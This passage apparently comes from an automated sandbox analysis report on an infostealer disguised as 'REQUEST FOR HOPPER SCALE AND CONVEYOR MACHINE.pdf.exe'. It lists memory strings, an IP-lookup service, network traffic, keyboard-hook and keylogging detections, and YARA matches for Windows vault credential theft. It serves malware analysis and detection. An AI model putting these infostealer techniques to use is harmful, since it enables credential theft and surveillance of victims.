                    Source: RegSvcs.exe, 0000000F.00000002.3883053125.0000000005FA5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882253046.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892240809.0000000009468000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.000000000950D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094C5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3893617440.0000000009558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
                    Source: RegSvcs.exe, 0000000F.00000002.3874134304.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.000000000950D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3873154198.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882826861.0000000005F80000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3872420125.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.0000000009531000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094C5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892335862.0000000009474000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.00000000094FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1426563917.00000000036DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1483006470.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, vmPeKTe.exe, 0000000B.00000002.1486889993.000000000296E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 0000000F.00000002.3882253046.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892607664.00000000094AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.000000000301F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002CC6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.000000000950D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3872420125.0000000000EFC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.00000000094FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3893617440.0000000009558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, vmPeKTe.exe.0.drString found in binary or memory: http://www.elderscrolls.com/skyrim/character
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, vmPeKTe.exe.0.drString found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
                    Source: vmPeKTe.exe, 0000000B.00000002.1486889993.00000000025DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.elderscrolls.com/skyrim/player
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1481076677.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.1483006470.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 0000000A.00000002.1483006470.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 0000000A.00000002.1483006470.0000000002CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: RegSvcs.exe, 0000000F.00000002.3882449915.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.0000000009531000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094C5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002F7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3882308121.0000000005EFA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892335862.0000000009474000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3874134304.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3872420125.0000000000EFC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892991576.00000000094FA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3892760446.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3893617440.0000000009558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49713 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, 7KG.cs.Net Code: _4uWlHy9
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031326710_2_03132671
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031308710_2_03130871
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031313B00_2_031313B0
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031335900_2_03133590
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_03139DD80_2_03139DD8
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_03139C3C0_2_03139C3C
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_03131C5A0_2_03131C5A
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0313A3E80_2_0313A3E8
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031320C90_2_031320C9
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031344900_2_03134490
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031344800_2_03134480
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031353080_2_03135308
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0313132B0_2_0313132B
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031350180_2_03135018
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031350080_2_03135008
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0313569A0_2_0313569A
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031316980_2_03131698
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031356A80_2_031356A8
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031335430_2_03133543
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_03135B380_2_03135B38
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_03135B290_2_03135B29
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031358D00_2_031358D0
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_031358E00_2_031358E0
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_03139DC90_2_03139DC9
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_09E8183A0_2_09E8183A
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_09E899C00_2_09E899C0
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_09E8BA700_2_09E8BA70
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_09E89DF80_2_09E89DF8
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_09E8A2300_2_09E8A230
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_09E8B6380_2_09E8B638
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A7967840_2_0A796784
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A797D540_2_0A797D54
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A79D1B00_2_0A79D1B0
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A79D1A00_2_0A79D1A0
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeCode function: 0_2_0A79677C0_2_0A79677C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F9E48010_2_00F9E480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F94AB810_2_00F94AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F9AA5010_2_00F9AA50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F93EA010_2_00F93EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00F941E810_2_00F941E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654567010_2_06545670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_065466C010_2_065466C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654C23810_2_0654C238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654B2E810_2_0654B2E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654313810_2_06543138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06547E4810_2_06547E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654776810_2_06547768
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654E46010_2_0654E460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654242910_2_06542429
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654004010_2_06540040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_06545DAB10_2_06545DAB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0654000610_2_06540006
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC267111_2_00BC2671
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC087111_2_00BC0871
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC13B011_2_00BC13B0
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC359011_2_00BC3590
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC9C3C11_2_00BC9C3C
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC1C5A11_2_00BC1C5A
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC9DD811_2_00BC9DD8
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC20C911_2_00BC20C9
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BCA3E811_2_00BCA3E8
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC449011_2_00BC4490
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC448011_2_00BC4480
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC8ECD11_2_00BC8ECD
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC501811_2_00BC5018
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC500811_2_00BC5008
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC132111_2_00BC1321
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC530811_2_00BC5308
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC349811_2_00BC3498
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC56A811_2_00BC56A8
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC169811_2_00BC1698
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC569A11_2_00BC569A
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC58E011_2_00BC58E0
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC58D011_2_00BC58D0
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC5B3811_2_00BC5B38
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC5B2911_2_00BC5B29
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_00BC9DC911_2_00BC9DC9
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_07B866B411_2_07B866B4
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_07B866AD11_2_07B866AD
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_07B8D19011_2_07B8D190
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_07B8D18011_2_07B8D180
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_07B87D3211_2_07B87D32
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_08F5181811_2_08F51818
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_08F52FB811_2_08F52FB8
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_08F599B811_2_08F599B8
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_08F5BA6811_2_08F5BA68
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_08F59DF011_2_08F59DF0
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_08F5A22811_2_08F5A228
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeCode function: 11_2_08F5B63011_2_08F5B630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B741E815_2_02B741E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B7E79015_2_02B7E790
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B74AB815_2_02B74AB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B73EA015_2_02B73EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_02B7AA5015_2_02B7AA50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B567015_2_066B5670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B7E4815_2_066B7E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066BC23815_2_066BC238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066BB2E815_2_066BB2E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B66C015_2_066B66C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B313815_2_066B3138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B776815_2_066B7768
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066BE46015_2_066BE460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B004015_2_066B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B242915_2_066B2429
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B5DAB15_2_066B5DAB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_066B000615_2_066B0006
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1426563917.000000000339C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1450506866.000000000A140000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1439261484.0000000008230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1425000196.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1429937716.0000000004B82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7deaa2c8-0175-46c6-89fa-60bdde53370e.exe4 vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1426563917.00000000036E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7deaa2c8-0175-46c6-89fa-60bdde53370e.exe4 vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000000.1402471974.0000000000F82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQWoCK.exeL vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe, 00000000.00000002.1429937716.0000000004B49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeBinary or memory string: OriginalFilenameQWoCK.exeL vs REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
